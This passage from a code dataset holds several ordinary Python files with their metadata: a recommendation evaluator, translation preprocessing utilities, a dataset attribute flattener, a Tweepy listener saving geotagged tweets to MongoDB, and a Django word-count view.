"repo_name": "Santara/RAIL", "sub_path": "scripts/read_h5_logs_and_analyse.py", "file_name": "read_h5_logs_and_analyse.py", "file_ext": "py", "file_size_in_byte": 8827, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.ones", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 16, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt", "line_number": 48, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 48, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 64, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt", "line_number": 73, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 73, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 79, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 92, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "scipy.signal.medfilt", "line_number": 111, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 157, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 166, "usage_type": "call"}]}
+{"seq_id": "23852145195", "text": "# evaluation.py \n# script holding function to evaluate the quality of recommendation based on queried metadata\n\n# last modified : 29/11/21\n# author : jonas-mika senghaas\n\nimport json\nimport os\nimport numpy as np\nfrom tqdm import tqdm\n\n\n#from envvars import GITHUB_TOKEN\n#from github_api import ReposSummary\n\n\"\"\"\n# expected format for recommendations\nmetadata = {'luky/na': {'languages': [['Python', 550], ['Java', 220]]}, \n 'jonas-mika/eduml': {'languages': [['Python', 2000]]},\n 'ludek/dotfiles': {'languages': [['vim', 220], ['Python', 100]]}\n }\n\ndata = {'rails/rails': ['technoweenie/restful-authentication']}\n\n\"\"\"\ndef build_evaluation_metadata(metadata, attributes, filepath='.', name='evaluation_metadata'):\n os.makedirs(filepath) if not os.path.exists(filepath) else None\n\n ans = {}\n for key, val in metadata.items():\n try:\n nkey = metadata[key]['repo_name']\n nval = {attribute: metadata[key][attribute] for attribute in attributes}\n except: None\n\n ans[nkey] = nval\n\n with open(f'{filepath}/{name}.json', 'w') as outfile:\n json.dump(ans, outfile)\n\n\n\ndef evaluate_recommendation(recommendations, metadata, attributes, test_size=0.5, total_score=False):\n \"\"\"\n function to evaluate the quality of the recommendation based on metadata.\n reads in underlying datastructure of the recommendation system (a dictionary that \n for each repo stores a list of n recommended repos, each being stored as a dictionary\n themselves with key being the recommended repo name and values being a dict of the metadata.\n\n Algorithmic Idea for Evaluation:\n A 'good recommendation' is defined to be a repository that is similar in some instances to \n the source repository. Thus, the idea is to assign a score of similarity \n for different features of the recommended repositories, namely for:\n - languages ( len of intersection / length of union of languages for each repo)\n - tags ( len of intersectio / length of union of repos for each repo)\n\n the score is averaged over the n recommended repository, the per repo score is a weighted\n average. the total score is averaged over all recommendations.\n \"\"\"\n n_repos = len(recommendations)\n\n\n if isinstance(test_size, int):\n random_sample_repos = np.random.choice(list(recommendations.keys()), size=test_size, replace=False) \n random_sample = {repo: recommendations[repo] for repo in random_sample_repos} \n elif isinstance(test_size, float):\n random_sample_repos = np.random.choice(list(recommendations.keys()), size=int(test_size*n_repos), replace=False)\n random_sample = {repo: recommendations[repo] for repo in random_sample_repos} \n\n random_sample = recommendations\n attribute_scores = {attribute: None for attribute in attributes}\n for attribute in attributes:\n attribute_score = _evaluate_attribute(random_sample, \n metadata, \n attribute, \n algorithm='jaccard', normalise=True)\n attribute_scores[attribute] = attribute_score\n\n if total_score:\n return np.mean(list(attribute_scores.values()))\n return attribute_scores\n\n\ndef _evaluate_attribute(random_sample, metadata, attribute, algorithm='jaccard', normalise=True):\n attribute_score = 0\n\n n_repos = len(random_sample)\n #n_recommend = len(list(random_sample.values())[0])\n\n # api = ReposSummary(GITHUB_TOKEN)\n\n src_missing = 0 \n for repo in random_sample: # maybe: subset of repos\n repo_score = 0\n\n src = metadata[repo] \n #print('working on: ', repo)\n src_attr = {x[0] for x in src[attribute]}\n\n if src_attr == None:\n src_missing += 1\n continue\n\n trg_missing = 0\n n_recommend = 0\n for recommended in random_sample[repo]:\n trg = metadata[recommended]\n trg_attr = {x[0] for x in trg[attribute]}\n\n if trg_attr == None:\n trg_missing += 1\n continue\n\n #print(src_attr, trg_attr)\n score = len(src_attr & trg_attr) / len(src_attr | trg_attr)\n #print(score)\n repo_score += score\n n_recommend += 1\n\n # normalise all score\n if n_recommend - trg_missing > 0:\n repo_score /= (n_recommend - trg_missing) \n else:\n repo_score = 0\n #print(repo_score, '\\n')\n attribute_score += repo_score\n\n # normalise summed attributes score and add total score\n if n_repos - src_missing > 0:\n attribute_score /= (n_repos - src_missing)\n else:\n attribute_score = 0\n\n return attribute_score\n\n\nif __name__ == '__main__':\n np.random.seed(0)\n with open('../data/transformed/metadata.json') as infile:\n metadata = json.load(infile)\n\n build_evaluation_metadata(metadata, ['languages'],filepath='../data/evaluation/')\n with open('../data/evaluation/evaluation_metadata.json', 'r') as infile:\n metadata = json.load(infile)\n\n algs = ['naive_hyperbolic','search_depth_hyperbolic'] #['naive_recommend', 'search_depth']\n\n for alg in algs:\n with open(f'./{alg}.json', 'r') as infile:\n data = json.load(infile)\n\n print(alg, ':', evaluate_recommendation(data, metadata, attributes=['languages'], test_size=0.5))\n", "repo_name": "ludekcizinsky/project-repommend", "sub_path": "cscripts/evaluation.py", "file_name": "evaluation.py", "file_ext": "py", "file_size_in_byte": 5464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 138, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 140, "usage_type": "call"}, {"api_name": "json.load", "line_number": 144, "usage_type": "call"}, {"api_name": "json.load", "line_number": 150, "usage_type": "call"}]}
+{"seq_id": "7091435767", "text": "import re\r\nimport unicodedata\r\nimport torch\r\n\r\nfrom dictionary import Dictionary\r\n\r\nPAD_TOKEN = 0\r\nSOS_TOKEN = 1\r\nEOS_TOKEN = 2\r\n\r\n#https://stackoverflow.com/a/518232/2809427\r\ndef unicodeToAscii(s):\r\n return ''.join(\r\n c for c in unicodedata.normalize('NFD', s)\r\n if unicodedata.category(c) != 'Mn'\r\n )\r\n\r\ndef normalizeString(s):\r\n s = unicodeToAscii(s.lower().strip())\r\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\r\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\r\n return s\r\n\r\n#load language into lists of sentences where corresponding indeces are translations from\r\n#one language to the other\r\n\r\n#reverse controls with language is input and output\r\n#FALSE: lang1 is input and lang2 is output\r\n#TRUE: lang2 is input and lang1 is output\r\ndef load_files(lang1, lang2, data_dir, reverse=True, MAX_FILE_SIZE=100000, MAX_LENGTH=60):\r\n #load first language to list\r\n lang1_list = []\r\n lang1_file = open(data_dir + '/' + lang1 + '-' + lang2 + '/' + lang1 + '.txt', 'r', encoding='utf8')\r\n for i, (line) in enumerate(lang1_file):\r\n if i < MAX_FILE_SIZE:\r\n lang1_list.append(line)\r\n else:\r\n break\r\n\r\n # load second langauge to list\r\n lang2_list = []\r\n lang2_file = open(data_dir + '/' + lang1 + '-' + lang2 + '/' + lang2 + '.txt', 'r', encoding='utf8')\r\n for i, (line) in enumerate(lang2_file):\r\n if i < MAX_FILE_SIZE:\r\n lang2_list.append(line)\r\n else:\r\n break\r\n\r\n #preprocess strings\r\n lang1_normalized = list(map(normalizeString, lang1_list))\r\n lang2_normalized = list(map(normalizeString, lang2_list))\r\n\r\n lang1_sentences = []\r\n lang2_sentences = []\r\n\r\n for i in range(len(lang1_normalized)):\r\n tokens1 = lang1_normalized[i].split(' ')\r\n tokens2 = lang2_normalized[i].split(' ')\r\n if len(tokens1) <= MAX_LENGTH and len(tokens2) <= MAX_LENGTH:\r\n lang1_sentences.append(lang1_normalized[i])\r\n lang2_sentences.append(lang2_normalized[i])\r\n\r\n del lang1_normalized\r\n del lang2_normalized\r\n\r\n if reverse:\r\n input_dic = Dictionary(lang2)\r\n output_dic = Dictionary(lang1)\r\n return input_dic, output_dic, lang2_sentences, lang1_sentences\r\n else:\r\n input_dic = Dictionary(lang1)\r\n output_dic = Dictionary(lang2)\r\n return input_dic, output_dic, lang1_sentences, lang2_sentences\r\n\r\n#takes in a sentence and dictionary, and tokenizes based on dictionary\r\ndef tokenize(sentence, dictionary, MAX_LENGTH=60):\r\n split_sentence = [word for word in sentence.split(' ')]\r\n token = [SOS_TOKEN]\r\n token += [dictionary.word2index[word] for word in sentence.split(' ')]\r\n token.append(EOS_TOKEN)\r\n token += [PAD_TOKEN]*(MAX_LENGTH - len(split_sentence))\r\n return token\r\n\r\n#create dataloader from a batch size and the two language lists\r\ndef load_batches(input_lang, output_lang, batch_size, device):\r\n data_loader = []\r\n for i in range(0, len(input_lang), batch_size):\r\n seq_length = min(len(input_lang) - batch_size, batch_size)\r\n input_batch = input_lang[i:i+seq_length][:]\r\n target_batch = output_lang[i:i+seq_length][:]\r\n input_tensor = torch.LongTensor(input_batch).to(device)\r\n target_tensor = torch.LongTensor(target_batch).to(device)\r\n data_loader.append([input_tensor, target_tensor])\r\n return data_loader", "repo_name": "u7javed/Transformer-Multi-Language-Translator", "sub_path": "utilities.py", "file_name": "utilities.py", "file_ext": "py", "file_size_in_byte": 3379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unicodedata.normalize", "line_number": 14, "usage_type": "call"}, {"api_name": "unicodedata.category", "line_number": 15, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 67, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 68, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 71, "usage_type": "call"}, {"api_name": "dictionary.Dictionary", "line_number": 72, "usage_type": "call"}, {"api_name": "dictionary.word2index", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "27952832416", "text": "import requests\nfrom bs4 import BeautifulSoup\n\nURL = requests.get(\"https://www.iban.com/currency-codes\")\nsoup = BeautifulSoup(URL.text, \"html.parser\")\n\npages = soup.find(\"table\",{\"class\":\"table\"})\npage = pages.find_all(\"tbody\")\n\ntemporarily = {}\nnumber_country = {}\n\ncountries_lists = []\nfor country in page:\n\n a = country.find_all(\"td\")\n a = list(a)\n\n country_list = 0\n code_list = 2\n\n while code_list >= 0:\n b = a[country_list].text\n c = a[code_list].text \n temporarily[f\"{b}\"] = f\"{c}\"\n country_list +=4\n code_list +=4\n if code_list >= len(a):\n break\n results = {key: value for key, value in temporarily.items() if len(value) != 0}\n\ncountries_lists.append(list(results))\ncountries_lists = countries_lists[0]\ncountries_list = [i.strip() for i in countries_lists]\n\n\ndef start():\n country = results.keys() \n max_numb = len(results.keys()) \n number = 0\n print(\"hello, my friend! Please choose select a country by number:\")\n for i in country: \n print(f\" # {number} {i}\")\n number += 1\n if number >= max_numb:\n break\n while[1]:\n try:\n select = int(input(\" # : \")) \n if countries_list[select] in countries_list:\n print(F\" You choose {countries_list[select]} \\n The currency code is {results[countries_list[select]]}\")\n break\n elif type(select) == int:\n print(\" please, enter a number from the list.\")\n else:\n print(\" That's wasn't a number.\") \n except: \n print(\" That's wasn't a number.\")\n\nstart()", "repo_name": "WinterWhiteSnow/github", "sub_path": "~08.01까지/nadocoding/6.18.py", "file_name": "6.18.py", "file_ext": "py", "file_size_in_byte": 1715, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 4, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 5, "usage_type": "call"}]}
+{"seq_id": "40399551079", "text": "# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\nfrom multiprocessing import Pool, cpu_count\n\nfrom ncc_dataset.codexglue.code_to_text import (\n LANGUAGES, RAW_DIR, ATTRIBUTES_DIR,\n)\nfrom ncc import LOGGER\nfrom ncc.utils.file_ops import (\n file_io,\n json_io,\n)\nfrom ncc.utils.path_manager import PathManager\n\n\ndef flatten_attrs(raw_file, flatten_dir, lang, attrs):\n def _get_file_info(filename):\n \"\"\"get mode and file index from file name\"\"\"\n filename = os.path.split(filename)[-1]\n mode = filename[:str.rfind(filename, '.jsonl')]\n return mode\n\n mode = _get_file_info(raw_file)\n attr_writers = {}\n for attr in attrs:\n attr_file = os.path.join(flatten_dir, lang, f'{mode}.{attr}')\n PathManager.mkdir(os.path.dirname(attr_file))\n attr_writers[attr] = file_io.open(attr_file, 'w')\n print('raw_file: ', raw_file)\n with file_io.open(raw_file, 'r') as reader:\n for line in reader:\n code_snippet = json_io.json_loads(line)\n for attr, info in code_snippet.items():\n if attr in attr_writers:\n print(json_io.json_dumps(info), file=attr_writers[attr])\n\n\ndef flatten(raw_dir, lang, flatten_dir, attrs, num_cores):\n \"\"\"flatten attributes of raw data\"\"\"\n LOGGER.info('Flatten the attributes({}) of {} raw dataset'.format(attrs, lang))\n\n with Pool(num_cores) as mpool:\n result = [\n mpool.apply_async(\n flatten_attrs,\n (raw_file, flatten_dir, lang, set(attrs))\n )\n for raw_file in PathManager.ls(os.path.join(raw_dir, lang, '*.jsonl'))\n ]\n result = [res.get() for res in result]\n\n\nif __name__ == '__main__':\n \"\"\"\n This script is to flatten attributes of code_search_net dataset\n Examples: 'code', 'code_tokens', 'docstring', 'docstring_tokens', 'func_name', 'original_string', 'index',\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Download CodeSearchNet dataset(s) or Tree-Sitter Library(ies)\")\n parser.add_argument(\n \"--languages\", \"-l\", default=LANGUAGES, type=str, nargs='+', help=\"languages constain [{}]\".format(LANGUAGES),\n )\n parser.add_argument(\n \"--raw_dataset_dir\", \"-r\", default=RAW_DIR, type=str, help=\"raw dataset download directory\",\n )\n parser.add_argument(\n \"--attributes_dir\", \"-d\", default=ATTRIBUTES_DIR, type=str, help=\"data directory of flatten attribute\",\n )\n parser.add_argument(\n \"--attrs\", \"-a\",\n default=['code', 'code_tokens', 'docstring', 'docstring_tokens', 'func_name'],\n type=str, nargs='+',\n help=\"attrs: code, code_tokens, docstring\",\n )\n parser.add_argument(\n \"--cores\", \"-c\", default=cpu_count(), type=int, help=\"cpu cores for flatten raw data attributes\",\n )\n args = parser.parse_args()\n # print(args)\n\n for lang in args.languages:\n flatten(raw_dir=args.raw_dataset_dir, lang=lang, flatten_dir=args.attributes_dir, attrs=args.attrs,\n num_cores=args.cores)\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc_dataset/codexglue/code_to_text/attributes_cast.py", "file_name": "attributes_cast.py", "file_ext": "py", "file_size_in_byte": 3056, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.split", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ncc.utils.path_manager.PathManager.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "ncc.utils.file_ops.file_io.open", "line_number": 30, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.file_io", "line_number": 30, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.file_io.open", "line_number": 32, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.file_io", "line_number": 32, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.json_io.json_loads", "line_number": 34, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.json_io", "line_number": 34, "usage_type": "name"}, {"api_name": "ncc.utils.file_ops.json_io.json_dumps", "line_number": 37, "usage_type": "call"}, {"api_name": "ncc.utils.file_ops.json_io", "line_number": 37, "usage_type": "name"}, {"api_name": "ncc.LOGGER.info", "line_number": 42, "usage_type": "call"}, {"api_name": "ncc.LOGGER", "line_number": 42, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 44, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager.ls", "line_number": 50, "usage_type": "call"}, {"api_name": "ncc.utils.path_manager.PathManager", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 60, "usage_type": "call"}, {"api_name": "ncc_dataset.codexglue.code_to_text.LANGUAGES", "line_number": 62, "usage_type": "name"}, {"api_name": "ncc_dataset.codexglue.code_to_text.RAW_DIR", "line_number": 65, "usage_type": "name"}, {"api_name": "ncc_dataset.codexglue.code_to_text.ATTRIBUTES_DIR", "line_number": 68, "usage_type": "name"}, {"api_name": "multiprocessing.cpu_count", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "12934990057", "text": "from __future__ import absolute_import, print_function\n\nfrom tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport tweepy\nimport json\nfrom pymongo import MongoClient\nimport datetime\n\n# Your credentials go here\n\n\nclass AvengersListener(StreamListener):\n\n def on_error(self, status_code):\n if status_code == 420:\n return False\n else:\n print('ERROR:' + repr(status_code))\n return True\n\n def on_data(self, raw_data):\n status = json.loads(raw_data)\n try:\n if 'delete' not in status: # Tweepy también detecta cuando se ha eliminado un tweet\n if status['geo']:\n created_at = status['created_at']\n created_at = datetime.datetime.strptime(created_at, '%a %b %d %H:%M:%S +0000 %Y')\n user_name = status['user']['screen_name']\n text = status['text']\n lat = str(status['coordinates']['coordinates'][1])\n lon = str(status['coordinates']['coordinates'][0])\n rts = status['retweet_count']\n favs = status['favorite_count']\n lang = status['user']['lang']\n print(status['text'])\n client = MongoClient('localhost', 27017)\n db = client['Tweets']\n collection = db['avengers']\n tweet = {'date': created_at, 'user': user_name, 'tweet': text,\n 'latitude': lat, 'longitude': lon, 'language': lang, 'retweets':rts, 'favourites':favs}\n collection.insert_one(tweet)\n except BaseException as e:\n print(\"Error on_data: %s\" % str(e))\n\n\nif __name__ == '__main__':\n\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n api = tweepy.API(auth)\n print(api.me().name)\n #\n # places = api.geo_search(query=\"USA\", granularity=\"country\")\n # place_id = places[0].id\n # tweets = api.search(q=\"place:%s\" % place_id)\n\n av_stream = Stream(auth, AvengersListener())\n av_stream.filter(track=['#avengersendgame','#endgame'])\n", "repo_name": "russomaa/Data-Science-Master", "sub_path": "BD_map_tweets/avengerslistener.py", "file_name": "avengerslistener.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tweepy.streaming.StreamListener", "line_number": 14, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 38, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 50, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 52, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "71961221927", "text": "from collections import OrderedDict\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.shortcuts import render\nfrom django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom .forms import GraphifyForm\nimport json\nimport string\n\ndef error_404(request):\n return render(request, \"404.html\", {})\n\n\ndef error_500(request):\n return render(request, \"500.html\", {})\n\n# Create your views here.\nclass HomeView(View):\n\tform_class = GraphifyForm\n\ttemplate_name = \"home.html\"\n\n\tdef get(self, request, *args, **kwargs):\n\t\tform = self.form_class(None)\n\t\tcontext ={\n\t\t\t'form':form,\n\t\t\t'labels': None,\n\t\t\t'data': None\n\t\t}\n\t\treturn render(request, self.template_name, context)\n\n\tdef post(self, request):\n\t\tform = self.form_class(request.POST, request.FILES or None)\n\t\terror = None\n\n\t\tif form.is_valid():\n\t\t\ttext_file = form.cleaned_data['file_input']\n\t\t\tdisplay_num = int(form.cleaned_data['display_num'])\n\t\t\tword_count = {}\n\n\t\t\tif not text_file:\n\t\t\t\tcontext ={\n\t\t\t\t\t'form':form,\n\t\t\t\t\t'labels': None,\n\t\t\t\t\t'data': None\n\t\t\t\t}\n\t\t\t\treturn render(request, self.template_name, context)\n\n\t\t\t# chck if this file is a text file\n\t\t\tif '.txt' in str(text_file)[-4:]:\n\t\t\t\ttry:\n\t\t\t\t\ttext_file_data = form.cleaned_data['file_input'].read().decode('utf-8')\n\t\t\t\t\ttranslator = text_file_data.maketrans('', '', string.punctuation)\n\t\t\t\t\ttext_file_data = text_file_data.translate(translator).lower()\n\n\t\t\t\t\tfor word in text_file_data.split():\n\t\t\t\t\t\tif word in word_count:\n\t\t\t\t\t\t\tword_count[word] += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tword_count[word] = 1\n\n\t\t\t\texcept UnicodeDecodeError as u:\n\t\t\t\t\terror = 'The file you tried to parse has encountered \\\n\t\t\t\t\ta unicode decoding error. Please fix the file and \\\n\t\t\t\t\tresubmit.'\n\t\t\t\texcept:\n\t\t\t\t\terror = 'An unknown error occured.'\n\n\t\t\telse:\n\t\t\t\terror = 'Please enter a text file please'\n\n\t\t\t# make sure the size of the list matches the\n\t\t\t# total number of bar you want to return\n\t\t\t# also put data in the right order\n\t\t\tlabels = []\n\t\t\tdata = []\n\t\t\tcount = len(word_count)\n\t\t\tword_count = OrderedDict(sorted(word_count.items(), key=lambda t: t[1]))\n\t\t\tword_count = list(word_count.items())\n\t\t\tword_count.reverse()\n\n\t\t\tif display_num > count:\n\t\t\t\tdisplay_num = count\n\n\t\t\tfor i in word_count[:display_num]:\n\t\t\t data.append(str(i[0]))\n\t\t\t labels.append(str(i[1]))\n\n\t\tcontext ={\n\t\t\t'form':form,\n\t\t\t'error': error,\n\t\t\t'labels': json.dumps(labels),\n\t\t\t'data': json.dumps(data)\n\t\t}\n\t\treturn render(request, self.template_name, context)\n", "repo_name": "devmasternathan/graphify", "sub_path": "graphify/graph/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2513, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 